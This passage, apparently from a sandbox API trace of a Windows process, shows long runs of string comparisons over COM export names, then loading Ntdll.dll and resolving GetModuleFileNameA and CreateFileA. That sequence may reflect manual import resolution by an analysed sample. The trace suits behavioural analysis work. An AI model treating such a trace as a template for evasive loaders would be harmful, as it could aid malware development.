lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40b7040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0101.525] CloseHandle (hObject=0x140) returned 1 [0101.525] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0101.525] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0101.525] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0101.525] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0101.525] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0101.525] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0101.525] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0101.525] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0101.525] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0101.525] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0101.525] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0101.525] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0101.525] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0101.525] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0101.526] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0101.526] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0101.526] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0101.527] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0101.527] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0101.527] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0101.527] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0101.527] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0101.527] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0101.527] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0101.527] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0101.527] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0101.527] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0101.527] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0101.527] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0101.527] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0101.527] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0101.527] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0101.527] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0101.527] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0101.527] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0101.527] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0101.527] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0101.527] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0101.527] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0101.527] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0101.527] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0101.527] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0101.528] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0101.528] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0101.528] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0101.528] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0101.528] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0101.528] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0101.528] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0101.529] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0101.530] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0101.530] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0101.531] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0101.531] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0101.531] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0101.531] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0101.531] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0101.531] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0101.531] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0101.531] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0101.531] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0101.531] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0101.531] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0101.531] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0101.531] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0101.531] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0101.531] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0101.531] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0101.531] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0101.531] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0101.531] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0101.532] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0101.533] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0101.533] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0101.533] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0101.533] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0101.534] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0101.534] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0101.534] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0101.534] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0101.534] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0101.534] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0101.534] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0101.534] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0101.534] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0101.534] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0101.534] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0101.534] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0101.534] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0101.534] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0101.534] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0101.534] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0101.534] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0101.534] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0101.534] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0101.534] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0101.534] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0101.534] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0101.534] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0101.535] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0101.822] GetProcessHeap () returned 0x4f0000 [0101.822] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x40b7040 | out: hHeap=0x4f0000) returned 1 [0101.829] GetProcessHeap () returned 0x4f0000 [0101.829] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x509270 [0101.829] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0101.829] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0101.829] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0101.829] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, 